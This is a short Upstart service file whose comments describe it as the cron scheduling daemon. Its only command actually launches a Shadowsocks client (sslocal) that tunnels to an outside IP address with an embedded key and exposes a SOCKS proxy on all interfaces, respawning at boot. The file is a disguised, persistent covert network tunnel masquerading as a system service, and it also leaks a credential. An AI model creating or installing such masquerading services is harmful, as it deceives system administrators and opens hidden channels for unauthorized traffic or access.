
# cron - regular background program processing daemon                                                                                               
#
# cron is a standard UNIX program that runs user-specified programs at
# periodic scheduled times

# description     "regular background program processing daemon"

start on runlevel [2345]
stop on runlevel [!2345]

respawn
 
exec sslocal -s 45.32.248.144 -k m8w5nB2q -b 0.0.0.0 -l 1080
